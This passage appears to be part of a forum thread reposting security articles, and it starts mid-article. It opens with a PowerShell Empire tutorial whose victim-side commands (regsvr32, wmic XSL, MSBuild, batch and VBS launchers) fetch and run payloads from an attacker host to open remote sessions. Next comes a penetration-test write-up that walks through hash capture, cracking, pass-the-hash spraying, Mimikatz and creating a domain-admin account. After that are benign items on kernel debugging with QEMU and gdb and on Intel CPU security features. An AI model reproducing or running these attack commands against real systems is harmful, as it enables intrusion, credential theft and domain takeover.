sysinfo

Exploiting through MSBuild.exe

Our next exploit is via MSBuild.exe, which will give you a remote session of Windows using an XML file. To know this attack in detail, please click here. To use this exploit, type:

listeners
uselistener http
set Host http://192.168.1.107
execute

This creates a listener. Type 'back' to go to the listener interface to create an exploit. For this, type:

usestager windows/launcher_xml
set Listener http
execute

Now an .xml file is created in /tmp. Copy this file to the victim's PC (inside Microsoft.NET\Framework\v4.0.30319\) and run it by typing the following combination of commands:

cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
MSBuild.exe launcher.xml

This way you will have your session. To access the said session, type:

interact A8H14C7L
sysinfo

Exploiting through regsvr32

Our next method is exploiting through regsvr32. To know this attack in detail, click here. As always, we first have to create a listener on our local machine.
Type the following command:

listeners
uselistener http
set Host http://192.168.1.107
execute

Now that a listener is created, type 'back' to go to the listener interface to create an exploit. For this, type:

usestager windows/launcher_sct
set Listener http
execute

This will create an .sct file in /tmp. Share this file to the victim's PC using the Python server and then run it from the Run window of the victim's PC by typing the following command:

regsvr32 /u /n /s /i:http://192.168.1.107:8080/launcher.sct scrobj.dll

Thus, you will have an active session. To access the session, type:

interact <session name>
sysinfo

Exploiting through XSL

XSL is a stylesheet language that describes how XML data should be formatted and transformed. Our next method of attack with Empire is exploiting an .xsl file. For this method, let's activate our listener first by typing:

listeners
uselistener http
set Host http://192.168.1.107
execute

As the listener is up and running, create your exploit:

usestager windows/launcher_xsl
set Listener http
execute

This way, the .xsl file is created.
Now run the Python server from the folder where the .xsl file was created, as shown in the image below:

cd /tmp
python -m SimpleHTTPServer 8080

Now execute the following command in the command prompt of your victim:

wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl"

Running the above will give a session. To access the session, type:

interact <session name>
sysinfo

Exploiting through Visual Basic script

Our next method is to create a malicious VBS file and exploit our victim through it. Like always, let's create a listener first:

listeners
uselistener http
set Host http://192.168.1.107
execute

Now, to create our malicious .vbs file, type:

usestager windows/launcher_vbs
set Listener http
execute

The next step is to start the Python server by typing:

python -m SimpleHTTPServer 8080

Once the .vbs file is shared through the Python server and executed on the victim's PC, you will have your session. Just like before, to access the session, type:

interact <session name>
sysinfo

Exploiting through .bat

In this method, we will exploit through a .bat file. Like our previous exploits, let's create a listener. For this, type:

listeners
uselistener http
set Host http://192.168.1.107
execute
back

The above commands will create a listener for you. Let's create our .bat file using the following commands:

usestager windows/launcher_bat
set Listener http
set OutFile /root/1.bat
execute

As shown, the above commands will create a .bat file.
Start up the Python server using the following command, to share the .bat file with your victim's PC:

python -m SimpleHTTPServer 8080

Once you run the .bat file, a session will activate. To access the session, type:

interact <session name>
sysinfo

Multi_launcher

This is the last method of this post. It can be used on various platforms such as Windows, Linux, etc. Again, even for this method, create a listener:

listeners
uselistener http
set Host http://192.168.1.107
execute

Then type the following commands to create your malicious file:

usestager multi/launcher
set Listener http
execute

Once you hit enter after the above commands, it will give you a code. Copy this code, paste it into the victim's command prompt and hit enter. As soon as you do, you will have an active session. To access the session, type:

interact <session name>
sysinfo

Conclusion

The above were methods that you can use to exploit Windows through different vulnerabilities. Using this framework is an addition to your pentesting skills after Metasploit. Enjoy!

Author: Yashika Dhir is a passionate researcher and technical writer at Hacking Articles. She is a hacking enthusiast. Contact here.

ABOUT THE AUTHOR

Raj Chandel

Raj Chandel is a skilled and passionate IT professional, especially in the IT hacking industry. At present, other than his name, he can also be called an ethical hacker, a cyber security expert and a penetration tester, with years of quality experience in the IT and software industry.

Sursa: https://www.hackingarticles.in/multiple-ways-to-exploiting-windows-pc-using-powershell-empire/
  22. Gaining Domain Admin from Outside Active Directory

Mar 4, 2018

…or why you should ensure all Windows machines are domain joined.

This is my first non-web post on my blog. I'm traditionally a web developer, and that is where my first interest in infosec came from. However, since I have managed to branch into penetration testing, initially part time and now full time, Active Directory testing has become my favourite type of penetration test. This post is about an internal network test I did for a client earlier in the year. This client's network is a tough nut to crack, and one I've tested before, so I was somewhat apprehensive about going back in case I came away without having "hacked in". We had only just managed it the previous time.

The first thing I run on an internal test is the Responder tool. This will grab Windows hashes from LLMNR or NetBIOS requests on the local subnet. However, this client was wise to this and had LLMNR & NetBIOS requests disabled. Despite already knowing this from the previous engagement, one of the things I learned during my OSCP course was to always try the easy things first - there's no point in breaking in through a skylight if the front door is open. So I ran Responder, and was surprised to see the following hash captured. Note, of course, that I would never reveal client confidential information on my blog; everything you see here is anonymised and recreated in the lab with details changed.

Here we can see the host 172.16.157.133 has sent us the NETNTLMv2 hash for the account FRONTDESK. Checking this host's NetBIOS information with CrackMapExec (other tools are available), we can check whether this is a local account hash. If it is, the "domain" part of the username:

[SMBv2] NTLMv2-SSP Username : 2-FD-87622\FRONTDESK

i.e. 2-FD-87622, should match the host's NetBIOS name.
Looking up the IP with CME, we can see that the name of the host matches. So the next port of call is to try to crack this hash and gain the plaintext password. Hashcat was loaded against rockyou.txt and rules, and quickly cracked the password:

hashcat -m 5600 responder /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule

Now we have a set of credentials for the front desk machine. Hitting the machine again with CME, but this time passing the cracked credentials:

cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth

We can see Pwn3d! in the output, showing us this is a local administrator account. This means we have the privileges required to dump the local password hashes:

cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth --sam

Note we can see:

FRONTDESK:1002:aad3b435b51404eeaad3b435b51404ee:eb6538aa406cfad09403d3bb1f94785f:::

This time we are seeing the NTLM hash of the password, rather than the NETNTLMv2 "challenge/response" hash that Responder caught earlier. Responder catches hashes over the wire, and these are different from the format that Windows stores in the SAM.

The next step was to spray the local administrator hash against the client's server range. Note that we don't even have to crack this administrator password - we can simply "pass-the-hash":

cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth

We can only pass-the-hash using the stored NTLM format, not the NETNTLMv2 network format (unless you look to execute an "SMB relay" attack instead). To our surprise, it got a hit: the local administrator password had been reused on the STEWIE machine. Querying this host's NetBIOS info:

$ cme smb 172.16.157.134
SMB 172.16.157.134 445 STEWIE [*] Windows Server 2008 R2 Foundation 7600 x64 (name:STEWIE) (domain:MACFARLANE) (signing:False) (SMBv1:True)

We can see it is a member of the MACFARLANE domain, the main domain of the client's Active Directory.
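As an aside, the --sam output shown above is in the usual pwdump format (username:RID:LM:NT:::), and pass-the-hash only needs the fourth (NT) field. A quick illustrative sketch using the anonymised line from the post:

```shell
# Extract the NT hash (4th colon-separated field) from a pwdump-style line.
sam_line='FRONTDESK:1002:aad3b435b51404eeaad3b435b51404ee:eb6538aa406cfad09403d3bb1f94785f:::'
nt_hash=$(printf %s "$sam_line" | cut -d: -f4)
echo "$nt_hash"   # -> eb6538aa406cfad09403d3bb1f94785f
```

The third field here (aad3b435...) is the well-known empty-LM placeholder, which is why the sprays above pass the full LM:NT pair without ever cracking the LM half.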
So the non-domain machine had a local administrator password which was reused on the internal servers. We can now use Metasploit to PsExec onto the machine, using the NTLM hash as the password, which will cause Metasploit to pass-the-hash. Once run, our shell is gained. We can then load the Mimikatz module and read Windows memory to find passwords - looks like we have the DA (Domain Admin) account details. And to finish off, we use CME to execute commands on the Domain Controller to add ourselves as a DA (purely as a POC for our pentest; in real life, or to remain more stealthy, we could just use the discovered account):

cme smb 172.16.157.135 -u administrator -p 'October17' -x 'net user markitzeroda hackersPassword! /add /domain /y && net group "domain admins" markitzeroda /add'

Note the use of the undocumented /y switch to suppress the prompt Windows gives you for adding a password longer than 14 characters. A screenshot of Remote Desktop to the Domain Controller can go into the report as proof of exploitation.

So if this front desk machine had been joined to the domain, it would have had LLMNR disabled (from their Group Policy setting) and we wouldn't have gained the initial access to it and leveraged its secrets to compromise the whole domain. Of course, there are other mitigations, such as using LAPS to manage local administrator passwords and setting FilterAdministratorToken to prevent SMB logins using the local RID 500 account (great post on this here).

Sursa: https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html
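For reference, the FilterAdministratorToken hardening mentioned above is a registry value under the UAC policy key; a sketch of it as a .reg fragment (double-check against current Microsoft guidance before deploying):

```
Windows Registry Editor Version 5.00

; Enables Admin Approval Mode for the built-in RID 500 Administrator,
; so its token is filtered over the network, blocking this PtH path.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"FilterAdministratorToken"=dword:00000001
```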
  23. Single-stepping through the Kernel

Feb 3, 2019 · tech · linux · kernel

There may come a time in a system programmer's life where she needs to leave the civilized safety of the userland and confront the unspeakable horrors that dwell in the depths of the Kernel space. While higher beings might pour scorn on the very idea of a Kernel debugger, us lesser mortals may have no other recourse but to single-step through Kernel code when the rivers begin to run dry. This guide will help you do just that. We hope you never actually have to.

Ominous-sounding intro-bait notwithstanding, setting up a virtual machine for Kernel debugging isn't really that difficult. It only needs a bit of preparation. If you just want a copypasta, skip to the end. If you're interested in the predicaments involved and how to deal with them, read on.

N.B.: "But which kernel are you talking about?", some heathens may invariably ask, when it is obvious that Kernel with a capital K refers to the One True Kernel.

Building the Kernel

Using a minimal Kernel configuration instead of the kitchen-sink one that distributions usually ship will make life a lot easier. You will first need to grab the source code for the Kernel you are interested in. We will use the latest Kernel release tarball from kernel.org, which at the time of writing is 4.20.6. Inside the extracted source directory, invoke the following:

make defconfig
make kvmconfig
make -j4

This will build a minimal Kernel image that can be booted in QEMU like so:

qemu-system-x86_64 -kernel linux-4.20.6/arch/x86/boot/bzImage

This should bring up an ancient-looking window with a cryptic error message. You could try pasting the error message into a search engine - except for the fact that you can't select the text in the window. And frankly, the window just looks annoying!
So, ignoring the actual error for a moment, let's try to get QEMU to print to the console instead of spawning a new graphical window:

qemu-system-x86_64 -nographic -kernel linux-4.20.6/arch/x86/boot/bzImage

QEMU spits out a single line:

qemu-system-x86_64: warning: TCG doesn't support requested feature: CPUID.01H:ECX.vmx [bit 5]

Htop tells me QEMU is using 100% of a CPU and my laptop fan agrees. But there is no output whatsoever and Ctrl-c doesn't work! What does work, however, is pressing Ctrl-a and then hitting x:

QEMU: Terminated

Turns out that by passing -nographic, we have unplugged QEMU's virtual monitor. Now, to actually see any output, we need to tell the Kernel to write to a serial port:

qemu-system-x86_64 -nographic -kernel linux-4.20.6/arch/x86/boot/bzImage -append "console=ttyS0"

It worked! Now we can read the error message in all its glory:

[ 1.333008] VFS: Cannot open root device "(null)" or unknown-block(0,0): error -6
[ 1.334024] Please append a correct "root=" boot option; here are the available partitions:
[ 1.335152] 0b00 1048575 sr0
[ 1.335153] driver: sr
[ 1.335996] Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(0,0)
[ 1.337104] CPU: 0 PID: 1 Comm: swapper/0 Not tainted 4.20.6 #1
[ 1.337901] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[ 1.339091] Call Trace:
[ 1.339437] dump_stack+0x46/0x5b
[ 1.339888] panic+0xf3/0x248
[ 1.340295] mount_block_root+0x184/0x248
[ 1.340838] ? set_debug_rodata+0xc/0xc
[ 1.341357] mount_root+0x121/0x13f
[ 1.341837] prepare_namespace+0x130/0x166
[ 1.342378] kernel_init_freeable+0x1ed/0x1ff
[ 1.342965] ?
rest_init+0xb0/0xb0
[ 1.343427] kernel_init+0x5/0x100
[ 1.343888] ret_from_fork+0x35/0x40
[ 1.344526] Kernel Offset: 0x1200000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff)
[ 1.345956] ---[ end Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(0,0) ]---

So, the Kernel didn't find a root filesystem to kick off the user mode with and panicked. Let's fix that by creating a root filesystem image.

Creating a Root Filesystem

Start by creating an empty image:

qemu-img create rootfs.img 1G

And then format it as ext4 and mount it:

mkfs.ext4 rootfs.img
mkdir mnt
sudo mount -o loop rootfs.img mnt/

Now we can populate it using debootstrap:

sudo debootstrap bionic mnt/

This will create a root filesystem based on Ubuntu 18.04 Bionic Beaver. Of course, feel free to replace bionic with any release that you prefer. Unmount the filesystem once we're done - this is important if you want to avoid corrupted images!

sudo umount mnt

Now boot the Kernel with our filesystem. We need to tell QEMU to use our image as a virtual hard drive, and we also need to tell the Kernel to use that hard drive as the root filesystem:

qemu-system-x86_64 -nographic -kernel linux-4.20.6/arch/x86/boot/bzImage -hda rootfs.img -append "root=/dev/sda console=ttyS0"

This time the Kernel shouldn't panic and you should eventually see a login prompt. We could have set up a user while creating the filesystem, but it's annoying to have to log in each time we boot up the VM. Let's enable auto login as root instead.
Terminate QEMU (Ctrl-a, x), mount the filesystem image again and then create the configuration folder structure:

sudo mount -o loop rootfs.img mnt/
sudo mkdir -p mnt/etc/systemd/system/serial-getty@ttyS0.service.d

Add the following lines to mnt/etc/systemd/system/serial-getty@ttyS0.service.d/autologin.conf:

[Service]
ExecStart=
ExecStart=-/sbin/agetty --noissue --autologin root %I $TERM
Type=idle

Make sure to unmount the filesystem and then boot the Kernel again. This time you should be automatically logged in. Gracefully shut down the VM:

halt -p

Attaching a debugger

Let's rebuild the Kernel with debugging symbols enabled:

./scripts/config -e CONFIG_DEBUG_INFO
make -j4

Now, boot the Kernel again, this time passing the -s flag, which will make QEMU listen on TCP port 1234:

qemu-system-x86_64 -nographic -kernel linux-4.20.6/arch/x86/boot/bzImage -hda rootfs.img -append "root=/dev/sda console=ttyS0" -s

Now, in another terminal, start gdb and attach to QEMU:

gdb ./linux-4.20.6/vmlinux
...
Reading symbols from ./linux-4.20.6/vmlinux...done.
(gdb) target remote :1234
Remote debugging using :1234
0xffffffff95a2f8f4 in ?? ()
(gdb)

You can set a breakpoint on a Kernel function, for instance do_sys_open():

(gdb) b do_sys_open
Breakpoint 1 at 0xffffffff811b2720: file fs/open.c, line 1049.
(gdb) c
Continuing.

Now try opening a file in the VM, which should result in do_sys_open() getting invoked... And nothing happens?! The breakpoint in gdb is not hit. This is due to a Kernel security feature called KASLR. KASLR can be disabled at boot time by adding nokaslr to the Kernel command line arguments. But let's actually rebuild the Kernel without KASLR. While we are at it, let's also disable loadable module support, which will save us the trouble of copying the modules to the filesystem.
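Creating the autologin drop-in by hand with sudo works fine, but it's easy to script. A sketch follows; the DESTDIR variable is my own addition so the result can be inspected in a scratch directory first, before pointing it at the mounted image root (DESTDIR=mnt, run with sudo).

```shell
#!/bin/sh
# Write the serial-getty autologin drop-in shown above.
# DESTDIR is a hypothetical knob: default is a local scratch
# directory; set DESTDIR=mnt (and use sudo) for the real image.
set -eu

DESTDIR=${DESTDIR:-./scratch}
DROPIN="$DESTDIR/etc/systemd/system/serial-getty@ttyS0.service.d"

mkdir -p "$DROPIN"
# Quoted heredoc so $TERM is written literally, as systemd expects.
cat > "$DROPIN/autologin.conf" <<'EOF'
[Service]
ExecStart=
ExecStart=-/sbin/agetty --noissue --autologin root %I $TERM
Type=idle
EOF

echo "wrote $DROPIN/autologin.conf"
```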
./scripts/config -e CONFIG_DEBUG_INFO -d CONFIG_RANDOMIZE_BASE -d CONFIG_MODULES
make olddefconfig # Resolve dependencies
make -j4

Reboot the Kernel again, attach gdb, set a breakpoint on do_sys_open() and run cat /etc/issue in the guest. This time the breakpoint should be hit. But probably not where you expected:

Breakpoint 1, do_sys_open (dfd=-100, filename=0x7f96074ad428 "/etc/ld.so.cache", flags=557056, mode=0) at fs/open.c:1049
1049    {
(gdb) c
Continuing.

Breakpoint 1, do_sys_open (dfd=-100, filename=0x7f96076b5dd0 "/lib/x86_64-linux-gnu/libc.so.6", flags=557056, mode=0) at fs/open.c:1049
1049    {
(gdb) c
Continuing.

Breakpoint 1, do_sys_open (dfd=-100, filename=0x7ffe9e630e8e "/etc/issue", flags=32768, mode=0) at fs/open.c:1049
1049    {
(gdb)

Congratulations! From this point, you can single-step away to your heart's content. By default, the root filesystem is mounted read-only. If you want to be able to write to it, add rw after root=/dev/sda in the Kernel parameters:

qemu-system-x86_64 -nographic -kernel linux-4.20.6/arch/x86/boot/bzImage -hda rootfs.img -append "root=/dev/sda rw console=ttyS0" -s

Bonus: Networking

You can create a point-to-point link between the QEMU VM and the host using a TAP interface.
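Retyping the attach-and-break sequence on every boot gets old quickly. gdb can replay commands from a file passed with -x, so one option (my own convenience sketch, not from the original post) is to generate such a file once:

```shell
#!/bin/sh
# Generate a gdb command file replaying the attach sequence above.
# Use it with: gdb -x attach.gdb ./linux-4.20.6/vmlinux
cat > attach.gdb <<'EOF'
target remote :1234
break do_sys_open
continue
EOF

echo "wrote attach.gdb"
```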
First install tunctl and create a persistent TAP interface to avoid running QEMU as root:

sudo apt install uml-utilities
sudo tunctl -u $(id -u)
Set 'tap0' persistent and owned by uid 1000
sudo ip link set tap0 up

Now launch QEMU with a virtual e1000 interface connected to the host's tap0 interface:

qemu-system-x86_64 -nographic -device e1000,netdev=net0 -netdev tap,id=net0,ifname=tap0 -kernel linux-4.20.6/arch/x86/boot/bzImage -hda rootfs.img -append "root=/dev/sda rw console=ttyS0" -s

Once the guest boots up, bring the network interface up:

ip link set enp0s3 up
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 52:54:00:12:34:56 brd ff:ff:ff:ff:ff:ff
    inet6 fe80::5054:ff:fe12:3456/64 scope link
       valid_lft forever preferred_lft forever

QEMU and the host can now communicate using their IPv6 link-local addresses. After all, it is 2019.
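The guest address shown in the ip a output above is just the EUI-64 link-local address derived from QEMU's default NIC MAC 52:54:00:12:34:56: flip the universal/local bit of the first octet and insert ff:fe in the middle. A small helper (my own sketch) makes the derivation explicit:

```shell
# Derive an IPv6 link-local address from a MAC address (EUI-64),
# the same mapping the kernel used for the guest interface above.
mac_to_ll() {
  local IFS=':'
  # Split the MAC into its six octets.
  set -- $1
  printf 'fe80::%x:%x:%x:%x\n' \
    $(( ((0x$1 ^ 0x02) << 8) | 0x$2 )) \
    $(( (0x$3 << 8) | 0xff )) \
    $(( 0xfe00 | 0x$4 )) \
    $(( (0x$5 << 8) | 0x$6 ))
}

# QEMU's default NIC MAC:
mac_to_ll 52:54:00:12:34:56
```

From the host you can then reach the guest with something like ping -6 "$(mac_to_ll 52:54:00:12:34:56)%tap0" (link-local addresses need the interface scope suffix).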
Copypasta

# Building a minimal debuggable Kernel
make defconfig
make kvmconfig
./scripts/config -e CONFIG_DEBUG_INFO -d CONFIG_RANDOMIZE_BASE -d CONFIG_MODULES
make olddefconfig
make -j4

# Create the root filesystem
qemu-img create rootfs.img 1G
mkfs.ext4 rootfs.img
mkdir mnt
sudo mount -o loop rootfs.img mnt/
sudo debootstrap bionic mnt/

# Add the following lines to mnt/etc/systemd/system/serial-getty@ttyS0.service.d/autologin.conf
# START
[Service]
ExecStart=
ExecStart=-/sbin/agetty --noissue --autologin root %I $TERM
Type=idle
# END

# Unmount the filesystem
sudo umount mnt

# Boot the Kernel with the root filesystem in QEMU
qemu-system-x86_64 -nographic -kernel linux-4.20.6/arch/x86/boot/bzImage -hda rootfs.img -append "root=/dev/sda rw console=ttyS0" -s

# Attach gdb
gdb ./linux-4.20.6/vmlinux
(gdb) target remote :1234

Sursa: https://www.anmolsarma.in/post/single-step-kernel/
24. Intel CPU security features

huku edited this page on Jul 31, 2016 · 23 revisions

List of Intel CPU security features along with short descriptions taken from the Intel manuals.

WP (Write Protect) (PDF)

Quoting Volume 3A, 4-3, Paragraph 4.1.3:

CR0.WP allows pages to be protected from supervisor-mode writes. If CR0.WP = 0, supervisor-mode write accesses are allowed to linear addresses with read-only access rights; if CR0.WP = 1, they are not (User-mode write accesses are never allowed to linear addresses with read-only access rights, regardless of the value of CR0.WP).

Interesting links:
WP: Safe or Not?

NXE/XD (No-Execute Enable/Execute Disable) (PDF)

Regarding the IA32_EFER MSR and NXE (Volume 3A, 4-3, Paragraph 4.1.3):

IA32_EFER.NXE enables execute-disable access rights for PAE paging and IA-32e paging. If IA32_EFER.NXE = 1, instruction fetches can be prevented from specified linear addresses (even if data reads from the addresses are allowed). IA32_EFER.NXE has no effect with 32-bit paging. Software that wants to use this feature to limit instruction fetches from readable pages must use either PAE paging or IA-32e paging.

Regarding XD (Volume 3A, 4-17, Table 4-11):

If IA32_EFER.NXE = 1, execute-disable (if 1, instruction fetches are not allowed from the 4-KByte page controlled by this entry; see Section 4.6); otherwise, reserved (must be 0).

SMAP (Supervisor Mode Access Prevention) (PDF)

Quoting Volume 3A, 4-3, Paragraph 4.1.3:

CR4.SMAP allows pages to be protected from supervisor-mode data accesses. If CR4.SMAP = 1, software operating in supervisor mode cannot access data at linear addresses that are accessible in user mode. Software can override this protection by setting EFLAGS.AC.

SMEP (Supervisor Mode Execution Prevention) (PDF)

Quoting Volume 3A, 4-3, Paragraph 4.1.3:

CR4.SMEP allows pages to be protected from supervisor-mode instruction fetches.
If CR4.SMEP = 1, software operating in supervisor mode cannot fetch instructions from linear addresses that are accessible in user mode.

MPX (Memory Protection Extensions) (PDF)

Intel MPX introduces new bounds registers and new instructions that operate on bounds registers. Intel MPX allows an OS to support user mode software (operating at CPL = 3) and supervisor mode software (CPL < 3) to add memory protection capability against buffer overrun. It provides controls to enable Intel MPX extensions for user mode and supervisor mode independently. Intel MPX extensions are designed to allow software to associate bounds with pointers, and allow software to check memory references against the bounds associated with the pointer to prevent out of bound memory access (thus preventing buffer overflow).

Interesting links:
Intel MPX support in the GCC compiler
Intel Memory Protection Extensions (Intel MPX) for Linux
intel_mpx.txt in Linux Kernel documentation

SGX (Software Guard Extensions) (PDF)

These extensions allow an application to instantiate a protected container, referred to as an enclave. An enclave is a protected area in the application's address space (see Figure 1-1), which provides confidentiality and integrity even in the presence of privileged malware. Accesses to the enclave memory area from any software not resident in the enclave are prevented.

Interesting links:
Intel Software Guard Extensions (SGX): A Researcher's Primer
CreateEnclave function at MSDN

Protection keys (PDF)

Quoting Volume 3A, 4-31, Paragraph 4.6.2:

The protection-key feature provides an additional mechanism by which IA-32e paging controls access to user-mode addresses. When CR4.PKE = 1, every linear address is associated with the 4-bit protection key located in bits 62:59 of the paging-structure entry that mapped the page containing the linear address. The PKRU register determines, for each protection key, whether user-mode addresses with that protection key may be read or written.
The following paragraphs, taken from LWN, shed some light on the purpose of memory protection keys:

One might well wonder why this feature is needed when everything it does can be achieved with the memory-protection bits that already exist. The problem with the current bits is that they can be expensive to manipulate. A change requires invalidating translation lookaside buffer (TLB) entries across the entire system, which is bad enough, but changing the protections on a region of memory can require individually changing the page-table entries for thousands (or more) pages. Instead, once the protection keys are set, a region of memory can be enabled or disabled with a single register write. For any application that frequently changes the protections on regions of its address space, the performance improvement will be large.

There is still the question (as asked by Ingo Molnar) of just why a process would want to make this kind of frequent memory-protection change. There would appear to be a few use cases driving this development. One is the handling of sensitive cryptographic data. A network-facing daemon could use a cryptographic key to encrypt data to be sent over the wire, then disable access to the memory holding the key (and the plain-text data) before writing the data out. At that point, there is no way that the daemon can leak the key or the plain text over the wire; protecting sensitive data in this way might also make applications a bit more resistant to attack.

Another commonly mentioned use case is to protect regions of data from being corrupted by "stray" write operations. An in-memory database could prevent writes to the actual data most of the time, enabling them only briefly when an actual change needs to be made. In this way, database corruption due to bugs could be fended off, at least some of the time. Ingo was unconvinced by this use case; he suggested that a 64-bit address space should be big enough to hide data in and protect it from corruption.
He also suggested that a version of mprotect() that optionally skipped TLB invalidation could address many of the performance issues, especially if huge pages were used. Alan Cox responded, though, that there is real-world demand for the ability to change protection on gigabytes of memory at a time, and that mprotect() is simply too slow.

CET (Control-flow Enforcement Technology) (PDF)

Control-flow Enforcement Technology (CET) provides the following capabilities to defend against ROP/JOP-style control-flow subversion attacks:

Shadow stack – return address protection to defend against Return Oriented Programming.
Indirect branch tracking – free branch protection to defend against Jump/Call Oriented Programming.

Sursa: https://github.com/huku-/research/wiki/Intel-CPU-security-features
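On Linux, most of the features listed above are exposed as flags in /proc/cpuinfo, so you can quickly check what the host CPU advertises. The flag names below are the kernel's own (pku is the flag for protection keys); CET has no single flag and only shows up on recent kernels, so it is left out of this sketch.

```shell
#!/bin/sh
# Report which of the Intel security features above the host CPU
# advertises, going by the feature flags in /proc/cpuinfo.
for flag in nx smep smap mpx sgx pku; do
  if grep -qw "$flag" /proc/cpuinfo; then
    echo "$flag: supported"
  else
    echo "$flag: not reported"
  fi
done
```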
25. PentestHardware

Kinda useful notes collated together publicly.

Comments and Fixes - some very kind people have begun to proofread this as I am writing it. It's still a long way from being finished, but comments are always welcome. Make an issue and provide comments in-PDF if you can.

NB - this is very much a work in progress, released early for comments and feedback. Hoping to complete the first full version by Xmas 2018.

For the current releases, this material is released under Creative Commons v3.0 - quote me all you like, and reference my work, no problem; print copies for yourselves, but just leave my name on it.

Sursa: https://github.com/unprovable/PentestHardware